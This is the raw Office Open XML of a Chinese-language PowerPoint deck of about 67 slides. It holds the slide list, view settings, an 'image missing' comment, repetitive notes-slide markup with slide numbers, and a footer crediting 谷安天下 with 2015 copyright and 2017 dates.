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comment1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="863" r:id="rId3"/>
    <p:sldId id="808" r:id="rId4"/>
    <p:sldId id="874" r:id="rId5"/>
    <p:sldId id="875" r:id="rId6"/>
    <p:sldId id="876" r:id="rId7"/>
    <p:sldId id="877" r:id="rId8"/>
    <p:sldId id="878" r:id="rId9"/>
    <p:sldId id="879" r:id="rId10"/>
    <p:sldId id="880" r:id="rId11"/>
    <p:sldId id="881" r:id="rId12"/>
    <p:sldId id="901" r:id="rId13"/>
    <p:sldId id="882" r:id="rId14"/>
    <p:sldId id="883" r:id="rId15"/>
    <p:sldId id="884" r:id="rId16"/>
    <p:sldId id="886" r:id="rId17"/>
    <p:sldId id="885" r:id="rId18"/>
    <p:sldId id="887" r:id="rId19"/>
    <p:sldId id="888" r:id="rId20"/>
    <p:sldId id="889" r:id="rId21"/>
    <p:sldId id="890" r:id="rId22"/>
    <p:sldId id="891" r:id="rId23"/>
    <p:sldId id="892" r:id="rId24"/>
    <p:sldId id="893" r:id="rId25"/>
    <p:sldId id="894" r:id="rId26"/>
    <p:sldId id="895" r:id="rId27"/>
    <p:sldId id="896" r:id="rId28"/>
    <p:sldId id="897" r:id="rId29"/>
    <p:sldId id="898" r:id="rId30"/>
    <p:sldId id="899" r:id="rId31"/>
    <p:sldId id="900" r:id="rId32"/>
    <p:sldId id="864" r:id="rId33"/>
    <p:sldId id="873" r:id="rId34"/>
    <p:sldId id="903" r:id="rId35"/>
    <p:sldId id="902" r:id="rId36"/>
    <p:sldId id="906" r:id="rId37"/>
    <p:sldId id="907" r:id="rId38"/>
    <p:sldId id="908" r:id="rId39"/>
    <p:sldId id="909" r:id="rId40"/>
    <p:sldId id="904" r:id="rId41"/>
    <p:sldId id="905" r:id="rId42"/>
    <p:sldId id="912" r:id="rId43"/>
    <p:sldId id="913" r:id="rId44"/>
    <p:sldId id="914" r:id="rId45"/>
    <p:sldId id="910" r:id="rId46"/>
    <p:sldId id="911" r:id="rId47"/>
    <p:sldId id="915" r:id="rId48"/>
    <p:sldId id="865" r:id="rId49"/>
    <p:sldId id="916" r:id="rId50"/>
    <p:sldId id="917" r:id="rId51"/>
    <p:sldId id="918" r:id="rId52"/>
    <p:sldId id="919" r:id="rId53"/>
    <p:sldId id="920" r:id="rId54"/>
    <p:sldId id="925" r:id="rId55"/>
    <p:sldId id="922" r:id="rId56"/>
    <p:sldId id="923" r:id="rId57"/>
    <p:sldId id="924" r:id="rId58"/>
    <p:sldId id="921" r:id="rId59"/>
    <p:sldId id="866" r:id="rId60"/>
    <p:sldId id="867" r:id="rId61"/>
    <p:sldId id="868" r:id="rId62"/>
    <p:sldId id="872" r:id="rId63"/>
    <p:sldId id="869" r:id="rId64"/>
    <p:sldId id="870" r:id="rId65"/>
    <p:sldId id="871" r:id="rId66"/>
    <p:sldId id="263" r:id="rId6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initials="y" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="y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540694"/>
    <a:srgbClr val="6807B9"/>
    <a:srgbClr val="0000CC"/>
    <a:srgbClr val="64C100"/>
    <a:srgbClr val="A60BFE"/>
    <a:srgbClr val="3D046C"/>
    <a:srgbClr val="FF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93882" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="1158" y="468"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2205"/>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06T00:00:23.509" idx="1">
    <p:pos x="10" y="10"/>
    <p:text>缺图</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C351C0-6D6D-4B39-8738-A7C7486B0710}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2017/10/8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4870BEF-24BB-4678-92B8-D9C03FCDED1A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2218320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s</a:t>
            </a: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B6D8C-6458-4548-BD75-3CEE170667F7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129713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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1401458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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711557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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327768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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4040577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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3637938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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4126236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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115542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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462809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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535823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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253327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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4258712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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1436393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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1325412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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81986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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3729687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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2938238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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="682723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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698874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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3671888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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191412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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96331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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398327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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1097277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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2518310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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835194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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1117829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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3557245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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2050773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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1828724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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214840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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3090682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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124514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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1015830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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14228409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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56071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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713503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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36866618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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18390292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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4882479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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492089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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2417151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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404416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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336652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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20264088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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7313715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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3615611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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6059978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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5107469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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39804270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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11386542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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1750439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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30454338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59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42912051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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281897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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19061929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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7724348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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25455940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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8986550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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18100885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65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279531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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050684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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4274517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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344354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25895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75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33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35588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8"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10"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46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2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08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8952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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>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10/8/2017 2:16 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
